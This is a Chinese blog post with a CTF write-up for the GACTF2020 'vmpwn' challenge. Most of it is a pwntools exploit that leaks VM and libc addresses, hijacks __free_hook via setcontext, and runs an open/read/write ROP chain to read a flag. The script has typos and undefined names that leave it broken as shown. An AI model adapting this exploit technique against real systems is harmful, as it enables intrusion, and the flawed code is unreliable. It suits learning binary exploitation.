GACTF2020&vmpwn

最新推荐文章于 2024-07-19 16:20:10 发布
最新推荐文章于 2024-07-19 16:20:10 发布
阅读量204 收藏 1
点赞数
分类专栏: CTF PWN 文章标签: 系统安全 安全架构 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39948058/article/details/119944533
版权
CTF 同时被 2 个专栏收录
32 篇文章 2 订阅
订阅专栏
PWN
29 篇文章 0 订阅
订阅专栏

**前言:上个星期复现了一道vmpwn题,忘记写到博客了,所以今天写一下,此题也属于比较常规的一种vmpwn题,只要逆出来opcode指令就能做出,这里根据官方wp来进行了复现了一下
思路:直接泄露了memaddr,然后再利用read往memaddr的后面进行了srop进行读取,即可
这里用到setcontext+15来控制执行流
这里没什么好演示的,直接给出exp吧**

exp:

#coding:utf8
from pwn import *
 
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
malloc_hook_s = libc.symbols['__malloc_hook']
free_hook_s = libc.symbols['__free_hook']
 
#opcodes
MOV_RAX_RSP = 0x10
MOV_RAX_I = 0x11
MOV_RBX_I = 0x12
MOV_RCX_I = 0x13
MOV_RAX_MEM_ADDR = 0x20
MOV_RAX_MEM = 0x21
PUSH_RAX = 0x44
POP_RBX = 0x52
ZERO_RAX = 0x6D
SYSCALL = 0x8F
#sh = process('./vmpwn',env={'LD_PRELOAD':'./libc-2.23.so'})
sh = remote('127.0.0.1',8666)
#泄露虚拟机的mem地址
sh.sendafter('name:','a'*0xF0)
sh.recvuntil('a'*0xF0)
vm_mem_addr = u64(sh.recv(6).ljust(8,'\x00'))
print 'vm_mem_addr=',hex(vm_mem_addr)
 
vm_shellcode_addr = vm_mem_addr + 0x2E20
opcode=[
    '\x20'+'\x0',   #mem-->rax
    '\x8f'+'\x3',  #free(rax)
    '\x21'+'\x0',   #mem+0x88---->rax
    '\x44'+'\x52',   #push rax  pop rbx     rbx--->rax
    '\x11'+'\x1',  #rax---->1
    '\x13'+'\x20',   
    '\x8f'+'\x1',  #write(rax,rbx,rcx)   write(1,mem+0x88,0x20)
    '\x6d',
    '\x12'+p64(vm_shellcode_addr+len(opcode)+0x20),
    '\x13'+'\x1000',  #read(0,vmshellcode+code+0x20),
    '\x8f'+'0',   #sycall(0)  read
]
payload='a'*0x100+p64(vm_shellcode_addr)
for i in range(len(opcode)):
    pyload+=opcode[i]
 
sh.sendafter('say:',payload)
sh.recvuntil('Now,I recevie your message,bye~')
sh.recvuntil('\n')
sh.recv(0x20)
main_arena_88 = u64(sh.recv(6).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_88 & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base + free_hook_s
open_addr = libc_base + libc.sym['open']
read_addr = libc_base + libc.sym['read']
write_addr = libc_base + libc.sym['write']
setcontext_addr = libc_base + libc.sym['setcontext']
pop_rdi = libc_base + 0x0000000000021112
pop_rsi = libc_base + 0x00000000000202f8
pop_rdx = libc_base + 0x0000000000001b92
bss = libc_base + libc.bss()
 
print 'libc_base=',hex(libc_base)
print 'free_hook_addr=',hex(free_hook_addr)
print 'setcontext_addr=',hex(setcontext_addr)
    
opcode=[
    '\x6d',
    '\x12'+p64(free_hook_addr-0xA0+8),
    '\x13'+'0x1000',
    '\x8f'+'\x0',  #read(0,rbx,0x1000)
]
payload=''
for i in range(len(opcode)):
    payload+=opcode[i]
 
p.send(payload)
 
rop=p64(pop_rdi)+p64(bss+0x200)+p64(pop_rsi)+p64(0)+p64(open_addr)     #open
rop+=p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(bss+0x200)+p64(pop_rdx)+p64(0x100)+p64(read_addr)
rop+=p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(bss+0x200)+p64(pop_rdx)+p64(0x100)+p64(write_addr)
rop+='flag\x00'
 
payload=p64(setcontext_addr+0x35)+p64(free_hook_addr+0x15)+rop
 
p.send(paylaod)
p.interactive()

总结:自己tcl,还是逆向分析能力不够,分析代码分析不出来什么,感觉懒吃了一大半,只要能逆出来就好做

jsjsj11123
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
buuctf刷题记录(一)
qq_43571856的博客
08-03 364
vn_pwn_warmup 开了nx和pie 这里给了puts的地址,可以得到libc的基地址 只有这里有个溢出点能溢出0x10个字节 原本的想法是直接用one_gadget来获得shell 但是一直都打不通,由于开了pie也没法本地调试 后来看了大佬的题解,才知道这个题禁用了execve。现在也不知道从哪里看出来的。 对于这种禁用execve或者没法使用system直接getshell的题。 我们可以使用orw来做。 可以把paylaod写到这里 然后在跳到这里执行 但是这个题没法用题目文件里的r
pwn】 gyctf_2020_borrowstack
Nothing
03-02 1615
例行检查 程序逻辑 看到buf缓冲区有0x10大小溢出,且可以控制bss段上的bank,可以用栈迁移做,这题的bss段离got表较近,在迁移时尽量往高地址迁移,防止在rop时破坏got表上数据。 from pwn import * io=remote('node3.buuoj.cn','29302') bank=0x0601080 leave=0x400699 puts_plt=0x0400...
DawgCTF2020国际赛pwn之tiktok
seaaseesa的博客
04-14 655
tiktok 这是DawgCTF 2020国际赛的一题,作为一血所得者,还是很高兴的。 首先,检查一下程序的保护机制,发现没开PIE 然后,我们用IDA分析一下,import_song函数打开文件描述符,然后存储在路径的后面那个空间 Play_song函数从打开的文件描述符里读取数据,申请的堆大小为nbytes+1,然后从文件里读取数据存入堆里,并打印出来。 Remove_s...
津门杯2021CTF pwn
qq_39948058的博客
08-26 474
前言:这个题一开始调通了,但是不知道正确的libc版本,远程没有打通,最后听了一下libc版本是11.4的libc2.23版本,才打通,题很多洞,比较经典的是edit的READ容易写。写到freehook为onegadget即可,tcl,只解了一道题,时间原因第二道pwn题也没看,噗。。 漏洞点: 漏洞点这两个地方,他们都是在bss段里,而且位置比较临近可以直接考虑一下任意写,当时没太注意这个点,直接doublefree的,发现只给了4个chunk,所以没能构建出,又审计了一下edit R.
vmpwn一&高校战役Easyvm复现
qq_39948058的博客
08-27 276
高校战役Easyvm 前言:本人tcl,刚接触vm不久,这个看了别人的wp感觉难度还可以,决定自己复现一下大佬勿喷哈 此题思路:就是依靠任意地址写来打freehook,然后再一把唆onegadget可以system也可以!! int __cdecl main(int argc, const char argv, const char **envp) { void *buf; // ST2C_4 _DWORD *ptr; // [esp+18h] [ebp-18h] int v5; // [esp+AC
GACTF2020-babyqemu
11-06
附件
GACTF2020 misc_crymisc
PushSafe
09-01 1067
GACTF2020 misc_crymisc 本人刚开始打ctf不久,希望各位师傅能对此文章提出宝贵的建议。 题目地址. 题目文件下载。866h 下载好的文件为:crymisc.docx 打开后显示报错,考虑将docx转换为zip文件查看docx文件里面的内容: 发现题目要求的文件打开3.jpg报错并提示密码错误,这时考虑zip伪加密 找到加密位置 改为00即可。 奇怪的知识又增加了: zip文件头信息 标准开头:50 4B 03 04 解压pkware版本:14 00 全局方式位标记: 00 00
HardeningMeter:一款针对二进制文件和系统安全强度的开源工具
FreeBuf_的博客
07-17 1129
其强大的功能包括全面检查各种二进制利用保护机制,包括 Stack Canary、RELRO、随机化(ASLR、PIC、PIE)、None Exec Stack、Fortify、ASAN、NX bit。HardeningMeter是一款针对二进制文件和系统安全强度的开源工具,该工具基于纯Python开发,经过了开发人员的精心设计,可以帮助广大研究人员全面评估二进制文件和系统的安全强化程度。-d --directory:指定要扫描的目录,该参数检索一个目录并递归扫描所有 ELF 文件;本项目的开发与发布遵循。
WAF基础介绍
weixin_68864415的博客
07-13 1072
WAF可以检测Web应用程序中的各种攻击,例如SQL注入、跨站点脚本攻击(XSS)、跨站请求伪造(CSRF)等,并采取相应的措施,例如拦截请求、阻止访问、记录事件等。日志记录:WAF记录所有请求和响应的详细信息,包括请求头、请求体、响应头、响应体等。攻击响应:WAF根据检测结果采取相应的措施,例如拦截请求、阻止访问、记录事件等。WAF可以检查请求头、请求体、Cookie、URL参数等信息,并识别其中的攻击。4、黑名单规则检查:注入攻击检查、跨站攻击检查、Webshell检查、中间件漏洞检查。
2024算力基础设施安全架构设计与思考(免费下载)
goodxianping的专栏
07-18 599
《2024算力基础设施安全架构设计与思考》正式发布,pdf版本提供免费下载
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
haiyunan的博客
07-16 542
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
邮件安全篇:邮件端到端加密S/MIME
sdexcel的专栏
07-19 775
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
全文翻译 | OWASP《LLM安全与治理检查清单》
lurenjia404的博客
07-17 812
本文是OWASP(开放式网络应用安全项目)发布的《LLM AI安全与治理清单》(以下简称“清单”),旨在为使用大型语言模型(LLM)的组织提供安全与治理方面的指导。清单强调了负责任和可信的人工智能(AI)的重要性,并指出AI技术,尤其是LLM,在创新、效率和商业成功方面具有巨大潜力,同时也带来了明显的挑战。文中讨论了LLM面临的挑战,包括控制和数据平面的不可分割性、非确定性设计、语义搜索的使用等,并强调了LLM增加的攻击面和相关风险。
园区道路车辆智能管控视频解决方案,打造安全畅通的园区交通环境
TSINGSEE青犀视频官方技术博客
07-16 806
AI智能分析网关V4消防通道占用算法基于人工智能视觉分析技术,通过摄像头实时监测识别是否有机动车违规停放在消防车通道上,并及时提醒管理人员进行处理。
[Linux安全运维] OpenVPN部署
Da1NtY的博客
07-19 737
同样的,在创建服务端证书的时候也需要输入一个Common Name用户名,注意与根证书用户名不一样。下载网址: https://github.com/OpenVPN/easy-rsa。2.6.1 将服务端所需的必要文件放到/etc/openvpn/中。2.6.2 将客户端所需的必要文件放到/root/client/中。创建/etc/openvpn/目录,将easy-rsa放进去。签约证书需要输入根证书的密码,与签约服务端证书时的过程一样。在日志文件/var/log/中创建一个openvpn/
数据库安全审计系统:筑牢数据安全防线 提高数据资产安全
2401_82472120的博客
07-17 426
其可以监控和审计用户对数据库中的数据库表、视图、序列、包、存储过程、函数、库、索引、同义词、快照、触发器等的访问、创建、修改和删除等,分析的内容可以精确到SQL操作语句级别。另外,它还可以根据设置的规则,智能判断出违规操作数据库的行为,并对违规行为进行记录、报警。通过对用户访问数据库行为的记录、分析和汇报,来帮助用户事后生成合规报告、事故追根溯源,同时通过大数据搜索技术提供高效查询审计报告,定位事件原因,以便日后查询、分析、过滤,实现加强内外部数据库网络行为的监控与审计,提高数据资产安全
响应“一机两用”政策号召 提高政务内外网安全
Canon_YK的博客
07-17 839
随着一机两用政策的实施,即政府部门内部网络终端在特定情况下需同时连接政务内外网,如何在保证工作效率的同时,确保网络安全和数据安全,成为摆在面前的重要课题。未来,随着技术的不断发展和完善,沙箱技术将在政务内外网安全中发挥更加重要的作用。深信达的SDC沙箱技术已经和多个政企单位合作,高效便捷的沙箱技术已经大大提升了政务机关的内网安全,为政务机关业务的开展提供了强有力的安全保障。SDC沙箱技术能够对隔离环境中的网络行为进行实时监控和审计,包括网络连接的建立、数据的传输、应用程序的运行等。
保障低压设备安全!中国星坤连接器精密工艺解析!
weixin_50506145的博客
07-16 524
随着技术的发展,对连接器的需求也在不断提升,特别是在低电压应用领域。中国星坤最新推出的低压连接器,以其精密性和安全性,为低电压设备提供了一个可靠的连接解决方案。中国星坤的低压连接器,以其卓越的性能和广泛的应用前景,为低电压设备的安全稳定运行提供了有力保障。随着技术的不断进步和市场需求的增长,低压连接器将在更多领域展现其独特的价值,成为连接现代电子世界的可靠伙伴。:在医疗领域,低压连接器用于连接各种便携式医疗监测设备,确保数据传输的准确性和设备的稳定性。:由于设计简洁,连接器的维护和更换变得简单快捷。
安全防御:防火墙基本模块
zhugedali_的博客
07-16 858
它会检查每个传入和传出的数据包的头部信息,包括源 IP 地址、目的 IP 地址、源端口、目的端口、协议类型(如 TCP、UDP、ICMP 等)以及数据包的标志位等。如果允许,防火墙会创建一个状态表项来记录该连接的状态,包括连接的方向、数据包的序列号等。- IDS/IPS 模块通常使用多种检测技术,包括基于特征的检测、基于异常的检测和基于协议分析的检测等,以提高检测的准确性和有效性。- 日志模块负责记录防火墙处理的所有活动和事件,包括数据包的过滤决策、连接的建立和终止、管理员的操作等详细信息。
游戏外挂的技术实现与五年脚本开发经验分享
最新发布
m0_62996549的博客
07-19 455
引言: 在数字娱乐的浪潮中,电子游戏成为许多人生活中不可或缺的一部分。然而,随着游戏的普及,一些玩家为了追求更高效的游戏体验或不正当竞争优势,开始使用游戏外挂程序。这些外挂往往通过修改游戏正常运行机制来提供非法优势给使用者。作为拥有五年脚本开发经验的技术人员,我深知探索这一领域需要严谨的态度和对技术的尊重。本文将探讨游戏外挂的技术实现方法,并分享我在脚本开发领域的经验。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值